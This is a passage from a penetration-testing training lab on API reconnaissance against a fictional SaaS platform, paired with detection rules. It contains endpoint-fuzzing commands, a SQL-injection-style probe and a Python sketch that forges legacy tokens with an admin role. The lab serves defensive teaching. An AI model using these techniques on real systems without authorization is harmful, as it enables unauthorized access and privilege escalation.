
Lab 25: API Security Testing

Chapter: 30 — Application Security | 44 — Web App Pentesting
Difficulty: ⭐⭐⭐⭐ Advanced
Estimated Time: 5–7 hours
Prerequisites: Chapter 16, Chapter 30, Chapter 44, HTTP fundamentals, JSON/REST basics


Overview

In this lab you will:

  1. Perform API reconnaissance and documentation analysis — discovering endpoints, analyzing OpenAPI/Swagger specifications, and mapping the full API attack surface
  2. Execute authentication and authorization attacks — JWT token manipulation, OAuth2 flow abuse, and broken object-level authorization (BOLA) exploitation
  3. Test for injection and data exposure vulnerabilities — SQL injection via API parameters, mass assignment, excessive data exposure, and SSRF through API calls
  4. Bypass rate limiting and exploit business logic flaws — rate limit evasion, race conditions, and workflow manipulation in API-driven processes
  5. Assess GraphQL security — introspection attacks, query depth and complexity abuse, batching attacks, and field suggestion exploitation
  6. Write detection rules and defensive configurations for every attack technique tested
  7. Map all findings to OWASP API Security Top 10 2023 categories and MITRE ATT&CK techniques

Synthetic Data Only

All data in this lab is 100% synthetic and fictional. All IP addresses use RFC 5737 (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24) or RFC 1918 (10.0.0.0/8, 172.16.0.0/12) reserved ranges. All domains use *.example.com. No real applications, real credentials, or real infrastructure are referenced. All credentials are shown as REDACTED. This lab is for defensive education only: never use these techniques against systems you do not own or without explicit written authorization.


Scenario

Engagement Brief — NovaTech Solutions

Organization: NovaTech Solutions (fictional)
Application: NovaPlatform — multi-tenant SaaS platform with REST and GraphQL APIs
REST API Base: https://api.example.com/v2 (SYNTHETIC)
GraphQL Endpoint: https://graphql.example.com/query (SYNTHETIC)
Developer Portal: https://developer.example.com (SYNTHETIC)
Server IP: 203.0.113.50 (SYNTHETIC — RFC 5737)
Internal Network: 10.50.0.0/16 (SYNTHETIC)
Cloud Provider: AWS (SYNTHETIC — Account ID 123456789012)
Engagement Type: Gray-box API penetration test
Scope: All NovaPlatform REST API v2 endpoints, GraphQL query endpoint, OAuth2 authorization server, webhook infrastructure
Out of Scope: Infrastructure (OS-level), third-party payment processor, DDoS testing, production customer data
Test Window: 2026-04-01 08:00 – 2026-04-03 20:00 UTC
Emergency Contact: soc@novatech.example.com (SYNTHETIC)

Summary: NovaTech Solutions has engaged your API security testing team to assess the security posture of their NovaPlatform SaaS APIs before a major enterprise client onboarding. NovaPlatform is a Python/FastAPI application with a PostgreSQL database, Redis caching layer, and an Elasticsearch-backed search service. The platform provides a REST API v2 for core operations (user management, project management, file storage, billing) and a GraphQL endpoint for analytics and reporting. The application uses JWT-based authentication with OAuth2 flows for third-party integrations. You have been provided with multiple test accounts across different tenant and role levels.


OWASP API Security Top 10 2023 Reference

Throughout this lab, findings map to the following categories:

# | Category | Description
API1:2023 | Broken Object Level Authorization | Manipulating object IDs to access other users' data
API2:2023 | Broken Authentication | Weak authentication mechanisms or implementation flaws
API3:2023 | Broken Object Property Level Authorization | Excessive data exposure or mass assignment
API4:2023 | Unrestricted Resource Consumption | Missing or inadequate rate limiting
API5:2023 | Broken Function Level Authorization | Access to admin functions from regular user context
API6:2023 | Unrestricted Access to Sensitive Business Flows | Abuse of legitimate business workflows
API7:2023 | Server Side Request Forgery | Tricking server into making requests to unintended locations
API8:2023 | Security Misconfiguration | Missing security headers, verbose errors, default configs
API9:2023 | Improper Inventory Management | Undocumented or deprecated API endpoints still active
API10:2023 | Unsafe Consumption of APIs | Trusting data from third-party APIs without validation

Prerequisites

Test Accounts (Synthetic)

Role | Username | Password | API Key | Tenant | Notes
Standard User | testuser | REDACTED | REDACTED-API-KEY-EXAMPLE | tenant-001 | Regular user account
Premium User | premiumuser | REDACTED | REDACTED-API-KEY-EXAMPLE | tenant-001 | Premium tier with elevated quotas
Admin User | admin | REDACTED | REDACTED-API-KEY-EXAMPLE | tenant-001 | Tenant administrator
Cross-Tenant User | crossuser | REDACTED | REDACTED-API-KEY-EXAMPLE | tenant-002 | User in different tenant
Service Account | svc-analytics | REDACTED | REDACTED-API-KEY-EXAMPLE | tenant-001 | Machine-to-machine service

OAuth2 Test Credentials (Synthetic)

Parameter | Value
Authorization Endpoint | https://auth.example.com/oauth2/authorize
Token Endpoint | https://auth.example.com/oauth2/token
Client ID | REDACTED-CLIENT-ID
Client Secret | REDACTED-CLIENT-SECRET
Redirect URI | https://app.example.com/callback
Scopes | read write admin billing

Required Tools

Tool | Purpose | Version
Burp Suite Community/Pro | Proxy, scanner, repeater, intruder | 2024.x+
Postman / Insomnia | API testing and collection management | Latest
curl | HTTP request crafting | 8.x+
jq | JSON parsing and manipulation | 1.7+
jwt_tool | JWT analysis, tampering, and exploitation | 2.x+
sqlmap | Automated SQL injection testing | 1.8+
GraphQL Voyager | GraphQL schema visualization | Latest
InQL | Burp extension for GraphQL testing | 5.x+
ffuf | API endpoint fuzzing | 2.1+
mitmproxy | Programmable HTTP proxy for automation | 10.x+
Python | Custom exploit scripting | 3.11+
httpx | Fast HTTP toolkit | Latest
nuclei | Template-based vulnerability scanner | 3.x+
Arjun | HTTP parameter discovery | 2.x+
kiterunner | API endpoint discovery | 2.x+

Target Architecture (Synthetic)

                    ┌──────────────────────────────────────┐
                    │              Internet                 │
                    └──────────────────┬───────────────────┘
                    ┌──────────────────▼───────────────────┐
                    │   AWS ALB / WAF (CloudFront)          │
                    │   203.0.113.50:443                    │
                    │   TLS 1.3 / Rate Limiting             │
                    └───────┬──────────┬───────────────────┘
                            │          │
              ┌─────────────▼──┐  ┌────▼──────────────────┐
              │  REST API       │  │  GraphQL Gateway       │
              │  FastAPI/Uvicorn│  │  Strawberry-GraphQL    │
              │  10.50.1.10:8000│  │  10.50.1.20:8080       │
              └───┬────┬───────┘  └───┬───────┬────────────┘
                  │    │              │       │
     ┌────────────▼──┐ │   ┌──────────▼──┐   │
     │  PostgreSQL    │ │   │  Elasticsearch│  │
     │  10.50.2.10    │ │   │  10.50.2.30   │  │
     │  :5432         │ │   │  :9200        │  │
     └───────────────┘ │   └──────────────┘   │
                       │                      │
              ┌────────▼──────────────────────▼──┐
              │  Redis Cache / Session Store      │
              │  10.50.2.20:6379                  │
              └──────────────────────────────────┘
              ┌────────▼──────────────────────────┐
              │  OAuth2 Authorization Server       │
              │  10.50.1.30:9000                   │
              │  auth.example.com                  │
              └───────────────────────────────────┘
              ┌────────▼──────────────────────────┐
              │  Internal Webhook Dispatcher       │
              │  10.50.3.10:8443                   │
              │  webhooks.internal.example.com     │
              └───────────────────────────────────┘

Lab Environment Setup

Setting Up Your Proxy

Configure Burp Suite as your intercepting proxy on 127.0.0.1:8080. Ensure your browser trusts the Burp CA certificate. All API requests should route through Burp for inspection, modification, and replay. For automated testing with Python scripts, configure the requests library to use the proxy:

proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080"
}

Step 1: Obtain Authentication Tokens

# Authenticate as standard user and obtain JWT
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "testuser", "password": "REDACTED"}' | jq .

# Expected response (SYNTHETIC)
{
  "access_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_SIGNATURE_DATA",
  "refresh_token": "REDACTED-REFRESH-TOKEN",
  "token_type": "Bearer",
  "expires_in": 3600
}
# Store the token for subsequent requests
export TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTEwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_SIGNATURE_DATA"

# Authenticate as admin
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": "REDACTED"}' | jq .

export ADMIN_TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTkwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAxIiwicm9sZSI6ImFkbWluIiwic2NvcGVzIjpbInJlYWQiLCJ3cml0ZSIsImFkbWluIiwiYmlsbGluZyJdLCJpYXQiOjE3MTE5MzYwMDAsImV4cCI6MTcxMTkzOTYwMCwiaXNzIjoiYXV0aC5leGFtcGxlLmNvbSJ9.SYNTHETIC_ADMIN_SIGNATURE"

# Authenticate as cross-tenant user
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "crossuser", "password": "REDACTED"}' | jq .

export CROSS_TOKEN="eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6InRlc3Qta2V5LTEifQ.eyJzdWIiOiJ1c2VyLTIwMDEiLCJ0ZW5hbnQiOiJ0ZW5hbnQtMDAyIiwicm9sZSI6InVzZXIiLCJzY29wZXMiOlsicmVhZCIsIndyaXRlIl0sImlhdCI6MTcxMTkzNjAwMCwiZXhwIjoxNzExOTM5NjAwLCJpc3MiOiJhdXRoLmV4YW1wbGUuY29tIn0.SYNTHETIC_CROSS_SIGNATURE"

Step 2: Verify Connectivity

# Test REST API health endpoint
curl -s https://api.example.com/v2/health | jq .
# Expected: {"status": "healthy", "version": "2.4.1", "timestamp": "2026-04-01T08:00:00Z"}

# Test GraphQL endpoint
curl -s -X POST https://graphql.example.com/query \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer $TOKEN" \
  -d '{"query": "{ __typename }"}' | jq .
# Expected: {"data": {"__typename": "Query"}}

# Verify API key authentication
curl -s https://api.example.com/v2/me \
  -H "X-API-Key: REDACTED-API-KEY-EXAMPLE" | jq .

Step 3: Configure Postman Environment

{
  "name": "NovaPlatform API Testing",
  "values": [
    {"key": "base_url", "value": "https://api.example.com/v2", "type": "default"},
    {"key": "graphql_url", "value": "https://graphql.example.com/query", "type": "default"},
    {"key": "auth_url", "value": "https://auth.example.com/oauth2", "type": "default"},
    {"key": "user_token", "value": "{{TOKEN}}", "type": "secret"},
    {"key": "admin_token", "value": "{{ADMIN_TOKEN}}", "type": "secret"},
    {"key": "cross_token", "value": "{{CROSS_TOKEN}}", "type": "secret"},
    {"key": "api_key", "value": "REDACTED-API-KEY-EXAMPLE", "type": "secret"}
  ]
}

Exercise 1: API Reconnaissance & Documentation Analysis

Objectives

  • Discover and enumerate all API endpoints through multiple reconnaissance techniques
  • Analyze OpenAPI/Swagger specifications for hidden or undocumented functionality
  • Map the complete API attack surface including deprecated and shadow endpoints
  • Identify information disclosure through API metadata, headers, and error messages
  • Understand authentication mechanisms and data flow patterns

OWASP API Mapping

Finding Category | OWASP API 2023
Undocumented endpoints | API9:2023 — Improper Inventory Management
Verbose error messages | API8:2023 — Security Misconfiguration
Exposed debug endpoints | API8:2023 — Security Misconfiguration
Shadow API versions | API9:2023 — Improper Inventory Management

Step 1.1: Passive Reconnaissance

Passive First

Always begin with passive reconnaissance to minimize noise. Gather as much intelligence as possible before sending active requests to the target API.

Discover API Documentation Endpoints

# Check common documentation paths
for path in /docs /redoc /swagger /swagger-ui /swagger.json /openapi.json \
            /api-docs /api/docs /api/swagger /api/v2/docs /api/v2/openapi.json \
            /graphql /graphiql /playground /altair /voyager \
            /.well-known/openapi.json /v1/docs /v2/docs /v3/docs; do
    STATUS=$(curl -s -o /dev/null -w "%{http_code}" "https://api.example.com${path}")
    echo "[${STATUS}] https://api.example.com${path}"
done

Expected Output (Synthetic):

[200] https://api.example.com/docs
[200] https://api.example.com/redoc
[200] https://api.example.com/openapi.json
[301] https://api.example.com/swagger
[404] https://api.example.com/swagger-ui
[200] https://api.example.com/api/v2/docs
[200] https://api.example.com/api/v2/openapi.json
[403] https://api.example.com/graphql
[200] https://api.example.com/graphiql
[404] https://api.example.com/playground
[404] https://api.example.com/altair
[404] https://api.example.com/voyager
[404] https://api.example.com/.well-known/openapi.json
[200] https://api.example.com/v1/docs
[200] https://api.example.com/v2/docs
[404] https://api.example.com/v3/docs

Finding: Legacy API Version Exposed

The v1 API documentation is still accessible at /v1/docs. Legacy API versions frequently lack security patches applied to newer versions. This is API9:2023 — Improper Inventory Management.

Retrieve and Analyze OpenAPI Specification

# Download the OpenAPI spec
curl -s https://api.example.com/openapi.json | jq . > novaplatform-openapi.json

# Count total endpoints
cat novaplatform-openapi.json | jq '.paths | keys | length'
# Expected: 47

# List all endpoints with HTTP methods
cat novaplatform-openapi.json | jq -r '.paths | to_entries[] | .key as $path | .value | to_entries[] | "\(.key | ascii_upcase) \($path)"' | sort

Expected Output (Synthetic):

DELETE /v2/projects/{project_id}
DELETE /v2/projects/{project_id}/files/{file_id}
DELETE /v2/users/{user_id}
GET    /v2/admin/audit-log
GET    /v2/admin/config
GET    /v2/admin/tenants
GET    /v2/admin/users
GET    /v2/billing/invoices
GET    /v2/billing/subscription
GET    /v2/health
GET    /v2/me
GET    /v2/projects
GET    /v2/projects/{project_id}
GET    /v2/projects/{project_id}/analytics
GET    /v2/projects/{project_id}/collaborators
GET    /v2/projects/{project_id}/files
GET    /v2/projects/{project_id}/files/{file_id}
GET    /v2/projects/{project_id}/files/{file_id}/download
GET    /v2/search
GET    /v2/users/{user_id}
GET    /v2/users/{user_id}/profile
GET    /v2/webhooks
GET    /v2/webhooks/{webhook_id}
PATCH  /v2/me
PATCH  /v2/projects/{project_id}
PATCH  /v2/users/{user_id}
POST   /v2/admin/impersonate
POST   /v2/auth/login
POST   /v2/auth/logout
POST   /v2/auth/refresh
POST   /v2/auth/register
POST   /v2/auth/reset-password
POST   /v2/billing/upgrade
POST   /v2/integrations/webhook-test
POST   /v2/projects
POST   /v2/projects/{project_id}/collaborators
POST   /v2/projects/{project_id}/export
POST   /v2/projects/{project_id}/files
POST   /v2/projects/{project_id}/import
POST   /v2/search
POST   /v2/users/{user_id}/api-keys
POST   /v2/webhooks
PUT    /v2/admin/config
PUT    /v2/billing/payment-method
PUT    /v2/projects/{project_id}/files/{file_id}
PUT    /v2/webhooks/{webhook_id}

Analyze Authentication Schemes

# Extract security schemes from OpenAPI spec
cat novaplatform-openapi.json | jq '.components.securitySchemes'

Expected Output (Synthetic):

{
  "BearerAuth": {
    "type": "http",
    "scheme": "bearer",
    "bearerFormat": "JWT",
    "description": "JWT access token from /auth/login"
  },
  "ApiKeyAuth": {
    "type": "apiKey",
    "in": "header",
    "name": "X-API-Key",
    "description": "API key for service-to-service communication"
  },
  "OAuth2": {
    "type": "oauth2",
    "flows": {
      "authorizationCode": {
        "authorizationUrl": "https://auth.example.com/oauth2/authorize",
        "tokenUrl": "https://auth.example.com/oauth2/token",
        "scopes": {
          "read": "Read access to resources",
          "write": "Write access to resources",
          "admin": "Administrative access",
          "billing": "Billing management access"
        }
      }
    }
  }
}

Identify Endpoints Lacking Authentication

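# Find operations with no operation-level security requirement.
# Note: an operation that omits `security` inherits any top-level default, so verify each hit.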
cat novaplatform-openapi.json | jq -r '
  .paths | to_entries[] |
  .key as $path |
  .value | to_entries[] |
  select(.value.security == [] or .value.security == null) |
  "\(.key | ascii_upcase) \($path)"
'

Expected Output (Synthetic):

GET    /v2/health
POST   /v2/auth/login
POST   /v2/auth/register
POST   /v2/auth/reset-password
GET    /v2/docs
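
A missing `security` key on an operation does not by itself mean the operation is open: in OpenAPI 3.x the operation inherits the top-level `security` array, and only an explicit empty list (or an empty requirement object `{}` inside the list) removes or relaxes it. The following sketch resolves that inheritance before reporting. The sample spec and the function name `unauthenticated_operations` are assumptions made for illustration.

```python
HTTP_METHODS = {"get", "put", "post", "delete", "options", "head", "patch", "trace"}


def unauthenticated_operations(spec):
    """Return operations whose effective security requirement allows no auth."""
    global_security = spec.get("security", [])
    open_ops = []
    for path, item in spec.get("paths", {}).items():
        for method, op in item.items():
            if method.lower() not in HTTP_METHODS:
                continue
            # Operation-level `security` overrides the top-level default
            effective = op.get("security", global_security)
            # [] means no requirement; {} inside the list makes auth optional
            if not effective or any(req == {} for req in effective):
                open_ops.append((method.upper(), path))
    return sorted(open_ops)


# Hypothetical spec fragment with a global bearer requirement
spec = {
    "security": [{"BearerAuth": []}],
    "paths": {
        "/v2/health": {"get": {"security": []}},                       # explicitly open
        "/v2/me": {"get": {}},                                         # inherits BearerAuth
        "/v2/search": {"get": {"security": [{"BearerAuth": []}, {}]}}, # auth optional
    },
}

for method, path in unauthenticated_operations(spec):
    print(method, path)
```

A spec only describes intent, so each reported operation still needs a live request without credentials to confirm the behavior.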

Step 1.2: Active Endpoint Discovery

Fuzz for Undocumented Endpoints

# Use ffuf to discover undocumented API endpoints
ffuf -u "https://api.example.com/v2/FUZZ" \
  -w /usr/share/wordlists/api-endpoints.txt \
  -H "Authorization: Bearer $TOKEN" \
  -mc 200,201,301,302,403,405 \
  -fc 404 \
  -t 10 \
  -rate 50 \
  -o ffuf-results.json \
  -of json
# Use kiterunner for API-specific endpoint discovery
kr scan https://api.example.com/v2 \
  -w /usr/share/wordlists/kiterunner/routes-large.kite \
  -H "Authorization: Bearer $TOKEN" \
  --fail-status-codes 404 \
  --max-redirects 0

Expected Discoveries (Synthetic):

[200] GET    /v2/debug/config          — Undocumented debug configuration
[200] GET    /v2/debug/routes          — Internal route listing
[200] GET    /v2/internal/metrics      — Prometheus metrics endpoint
[403] GET    /v2/admin/backup          — Database backup endpoint
[405] DELETE /v2/admin/tenants/{id}    — Tenant deletion (method not allowed but exists)
[200] GET    /v2/swagger.yaml          — YAML version of API spec
[301] GET    /v1/users                 — Legacy v1 API still responding
[200] POST   /v2/debug/query           — Direct database query endpoint

Critical Finding: Debug Endpoints Exposed

The /v2/debug/config, /v2/debug/routes, and /v2/debug/query endpoints are accessible and not documented in the OpenAPI specification. These represent severe security misconfigurations (API8:2023) and inventory management failures (API9:2023). The debug query endpoint could allow direct database manipulation.

Examine Debug Endpoint Disclosure

# Retrieve debug configuration (SYNTHETIC DATA)
curl -s https://api.example.com/v2/debug/config \
  -H "Authorization: Bearer $TOKEN" | jq .

Expected Output (Synthetic):

{
  "app_name": "NovaPlatform",
  "version": "2.4.1",
  "environment": "staging",
  "debug_mode": true,
  "database": {
    "host": "10.50.2.10",
    "port": 5432,
    "name": "novaplatform_db",
    "user": "app_user",
    "password": "REDACTED"
  },
  "redis": {
    "host": "10.50.2.20",
    "port": 6379,
    "db": 0
  },
  "jwt_secret": "REDACTED",
  "jwt_algorithm": "RS256",
  "jwt_public_key_url": "https://auth.example.com/.well-known/jwks.json",
  "elasticsearch": {
    "host": "10.50.2.30",
    "port": 9200
  },
  "webhook_signing_secret": "REDACTED",
  "aws_region": "us-east-1",
  "s3_bucket": "novaplatform-files-staging"
}

Critical Finding: Database Credentials Exposed

The debug configuration endpoint exposes internal infrastructure details including database credentials, JWT configuration, and AWS resource identifiers. This is a critical API8:2023 — Security Misconfiguration finding.

Enumerate Internal Routes

# Retrieve internal route listing
curl -s https://api.example.com/v2/debug/routes \
  -H "Authorization: Bearer $TOKEN" | jq '.routes[] | "\(.method) \(.path) [\(.auth_required)]"' -r | sort

Expected Output (Synthetic — highlights undocumented routes):

DELETE /v2/admin/cache                [admin]
DELETE /v2/admin/sessions/{id}        [admin]
GET    /v2/admin/audit-log            [admin]
GET    /v2/admin/backup               [admin]
GET    /v2/admin/config               [admin]
GET    /v2/debug/config               [none]        ← No auth required!
GET    /v2/debug/routes               [none]        ← No auth required!
GET    /v2/debug/sql-stats            [none]        ← No auth required!
GET    /v2/health                     [none]
GET    /v2/internal/metrics           [api_key]
POST   /v2/admin/impersonate          [admin]
POST   /v2/debug/query                [none]        ← No auth required!
POST   /v2/internal/cache-invalidate  [api_key]
POST   /v2/internal/reindex           [api_key]

Step 1.3: Header and Response Analysis

Fingerprint Technology Stack

# Capture and analyze response headers
curl -s -I https://api.example.com/v2/health

Expected Output (Synthetic):

HTTP/2 200
content-type: application/json
server: uvicorn
x-powered-by: FastAPI
x-request-id: req-a1b2c3d4-e5f6-7890-abcd-ef1234567890
x-ratelimit-limit: 1000
x-ratelimit-remaining: 999
x-ratelimit-reset: 1711939600
x-content-type-options: nosniff
x-frame-options: DENY
strict-transport-security: max-age=31536000; includeSubDomains
access-control-allow-origin: *
access-control-allow-methods: GET, POST, PUT, PATCH, DELETE, OPTIONS
access-control-allow-headers: Content-Type, Authorization, X-API-Key, X-Request-ID

Finding: Information Disclosure via Headers

  • server: uvicorn and x-powered-by: FastAPI reveal the exact technology stack
  • access-control-allow-origin: * — wildcard CORS is overly permissive
  • Rate limit headers expose the exact rate limiting configuration

These are API8:2023 — Security Misconfiguration issues.
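
These header checks are easy to automate across many endpoints. The sketch below flags the three issues described above from a dictionary of response headers; the finding codes and the `audit_headers` name are assumptions chosen for this example.

```python
def audit_headers(headers):
    """Return a list of finding codes for a dict of response headers."""
    # Header names are case-insensitive, so normalize before checking
    h = {name.lower(): value for name, value in headers.items()}
    findings = []
    for name in ("server", "x-powered-by"):
        if name in h:
            findings.append(f"banner:{name}={h[name]}")
    if h.get("access-control-allow-origin", "").strip() == "*":
        findings.append("cors:wildcard-origin")
    if any(name.startswith("x-ratelimit-") for name in h):
        findings.append("ratelimit:config-exposed")
    return findings


# Subset of the synthetic response headers shown above
sample = {
    "Server": "uvicorn",
    "X-Powered-By": "FastAPI",
    "X-RateLimit-Limit": "1000",
    "X-Content-Type-Options": "nosniff",
    "Access-Control-Allow-Origin": "*",
}

for finding in audit_headers(sample):
    print(finding)
```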

Analyze Error Response Verbosity

# Trigger various error conditions to analyze response detail

# 1. Invalid JSON
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d 'invalid-json' | jq .

# Expected (SYNTHETIC):
# {
#   "detail": "JSON decode error at line 1 column 1: Expecting value",
#   "type": "json_invalid",
#   "trace_id": "trace-abc123",
#   "stack_trace": "File \"/app/main.py\", line 42, in parse_body..."
# }

# 2. Invalid field type
curl -s -X POST https://api.example.com/v2/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": 12345, "password": true}' | jq .

# Expected (SYNTHETIC):
# {
#   "detail": [
#     {
#       "loc": ["body", "username"],
#       "msg": "str type expected",
#       "type": "type_error.str",
#       "ctx": {"model": "LoginRequest", "field": "username"}
#     }
#   ]
# }

# 3. Non-existent endpoint with SQL-like parameter
curl -s "https://api.example.com/v2/users/1%20OR%201=1" \
  -H "Authorization: Bearer $TOKEN" | jq .

# Expected (SYNTHETIC):
# {
#   "detail": "User not found",
#   "query_attempted": "SELECT * FROM users WHERE id = '1 OR 1=1'",
#   "error_code": "USER_NOT_FOUND"
# }

Finding: Stack Trace and SQL Query Leakage

Error responses include stack traces and raw SQL queries, revealing internal application structure and database query patterns. This is a severe API8:2023 — Security Misconfiguration finding: an attacker who can see the generated query can tune SQL injection payloads against it directly.
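
When many error responses have been collected, a small scanner can flag the ones that leak internals. This is a rough sketch under stated assumptions: the key names in `LEAK_KEYS` come from the synthetic responses above plus one guess (`traceback`), and the regular expressions are deliberately simple heuristics rather than a complete detector.

```python
import re

LEAK_KEYS = {"stack_trace", "query_attempted", "traceback"}
SQL_RE = re.compile(r"\b(SELECT|INSERT|UPDATE|DELETE)\b.+\b(FROM|INTO|SET)\b", re.I)
PATH_RE = re.compile(r'File "(/[^"]+)"')


def find_leaks(body):
    """Walk a decoded JSON error body and report leak indicators."""
    leaks = []

    def walk(node, trail):
        if isinstance(node, dict):
            for key, value in node.items():
                if key in LEAK_KEYS:
                    leaks.append(f"{trail}{key}: suspicious key")
                walk(value, f"{trail}{key}.")
        elif isinstance(node, list):
            for index, value in enumerate(node):
                walk(value, f"{trail}{index}.")
        elif isinstance(node, str):
            where = trail.rstrip(".")
            if SQL_RE.search(node):
                leaks.append(f"{where}: SQL text")
            if PATH_RE.search(node):
                leaks.append(f"{where}: source file path")

    walk(body, "")
    return leaks


sql_error = {
    "detail": "User not found",
    "query_attempted": "SELECT * FROM users WHERE id = '1 OR 1=1'",
    "error_code": "USER_NOT_FOUND",
}
for leak in find_leaks(sql_error):
    print(leak)
```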

Step 1.4: API Version Comparison

# Compare v1 and v2 endpoints to find deprecated but accessible functionality
curl -s https://api.example.com/v1/docs 2>/dev/null | python3 -c "
import sys, json
spec = json.load(sys.stdin)
v1_paths = set(spec.get('paths', {}).keys())
print(f'V1 endpoints: {len(v1_paths)}')
for p in sorted(v1_paths):
    print(f'  {p}')
"

Expected Output (Synthetic):

V1 endpoints: 23
  /v1/admin/users
  /v1/auth/login
  /v1/auth/register
  /v1/files/upload
  /v1/files/{file_id}
  /v1/health
  /v1/projects
  /v1/projects/{project_id}
  /v1/reports/generate
  /v1/search
  /v1/users
  /v1/users/{user_id}
  /v1/users/{user_id}/password
  ...
# Test v1 authentication — may use weaker mechanism
curl -s -X POST https://api.example.com/v1/auth/login \
  -H "Content-Type: application/json" \
  -d '{"username": "testuser", "password": "REDACTED"}' | jq .

Expected Output (Synthetic):

{
  "token": "dGVzdHVzZXI6MTcxMTkzNjAwMDp1c2VyOnRlbmFudC0wMDE=",
  "type": "Basic",
  "note": "V1 API uses base64-encoded tokens (deprecated)"
}

Finding: Legacy API Uses Weak Authentication

The v1 API uses base64-encoded tokens instead of signed JWTs, meaning tokens can be trivially forged. The decoded value testuser:1711936000:user:tenant-001 contains the username, timestamp, role, and tenant — all modifiable without cryptographic verification. This is both API2:2023 — Broken Authentication and API9:2023 — Improper Inventory Management.
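
To make the forgery concrete, the sketch below decodes the synthetic v1 token and re-encodes it with a modified role. It assumes the colon-separated field order described above (username, timestamp, role, tenant); the function names are introduced here for illustration.

```python
import base64


def decode_v1_token(token):
    """Split a v1 token into its four colon-separated fields."""
    user, issued_at, role, tenant = base64.b64decode(token).decode().split(":")
    return {"username": user, "iat": int(issued_at), "role": role, "tenant": tenant}


def forge_v1_token(username, issued_at, role, tenant):
    """Re-encode arbitrary fields; no key or signature is involved."""
    raw = f"{username}:{issued_at}:{role}:{tenant}"
    return base64.b64encode(raw.encode()).decode()


original = "dGVzdHVzZXI6MTcxMTkzNjAwMDp1c2VyOnRlbmFudC0wMDE="
claims = decode_v1_token(original)
print(claims)

# Change only the role; everything else is copied from the real token
forged = forge_v1_token(claims["username"], claims["iat"], "admin", claims["tenant"])
print(decode_v1_token(forged)["role"])
```

Because encoding is reversible without a secret, the server has no way to distinguish the forged token from one it issued.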

Step 1.5: Attack Surface Map

Based on reconnaissance, compile the attack surface map:

┌─────────────────────────────────────────────────────────────┐
│                 NovaPlatform Attack Surface                  │
├─────────────────────────────────────────────────────────────┤
│                                                             │
│  AUTHENTICATION SURFACE                                     │
│  ├── JWT (RS256) via /v2/auth/login                        │
│  ├── API Key via X-API-Key header                          │
│  ├── OAuth2 Authorization Code flow                        │
│  ├── Legacy base64 tokens via /v1/auth/login     [VULN]    │
│  └── Refresh token rotation via /v2/auth/refresh           │
│                                                             │
│  DOCUMENTED ENDPOINTS (47)                                  │
│  ├── User management (CRUD + profile)                      │
│  ├── Project management (CRUD + collaborators)             │
│  ├── File storage (upload, download, delete)               │
│  ├── Search (GET + POST)                                   │
│  ├── Billing (subscription, invoices, upgrade)             │
│  ├── Admin (audit log, config, users, impersonate)         │
│  └── Webhooks (CRUD + test)                                │
│                                                             │
│  UNDOCUMENTED ENDPOINTS                          [VULN]     │
│  ├── /v2/debug/config        (no auth!)                    │
│  ├── /v2/debug/routes        (no auth!)                    │
│  ├── /v2/debug/query         (no auth!)                    │
│  ├── /v2/debug/sql-stats     (no auth!)                    │
│  ├── /v2/internal/metrics    (api_key)                     │
│  ├── /v2/internal/cache-invalidate (api_key)               │
│  └── /v2/internal/reindex    (api_key)                     │
│                                                             │
│  GRAPHQL SURFACE                                            │
│  ├── /query endpoint                                       │
│  ├── GraphiQL IDE accessible                     [VULN]    │
│  └── Introspection status: TBD                             │
│                                                             │
│  INFORMATION DISCLOSURE                          [VULN]     │
│  ├── Server/framework headers                              │
│  ├── Stack traces in errors                                │
│  ├── SQL queries in error responses                        │
│  ├── Database credentials in debug config                  │
│  └── Internal IP addresses exposed                         │
│                                                             │
│  CORS CONFIGURATION                              [VULN]     │
│  └── Wildcard origin (*) with credential headers           │
│                                                             │
└─────────────────────────────────────────────────────────────┘

Detection & Defense — Exercise 1

KQL Detection: API Reconnaissance Activity

// Detect rapid sequential requests to documentation/debug endpoints
let recon_paths = dynamic(["/docs", "/redoc", "/swagger", "/openapi.json",
    "/debug/", "/internal/", "/graphiql", "/v1/"]);
ApiAccessLog
| where TimeGenerated > ago(15m)
| where URL has_any (recon_paths)
| summarize
    EndpointsHit = dcount(URL),
    RequestCount = count(),
    Paths = make_set(URL, 50)
    by ClientIP, bin(TimeGenerated, 5m)
| where EndpointsHit > 5
| project TimeGenerated, ClientIP, EndpointsHit, RequestCount, Paths
| order by EndpointsHit desc

SPL Detection: API Reconnaissance Activity

index=api_logs sourcetype=api_access
| eval is_recon=if(match(uri_path, "(docs|redoc|swagger|openapi|debug|internal|graphiql|/v1/)"), 1, 0)
| search is_recon=1
| bin _time span=5m
| stats dc(uri_path) as unique_paths, count as total_requests,
        values(uri_path) as paths by src_ip, _time
| where unique_paths > 5
| sort -unique_paths
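
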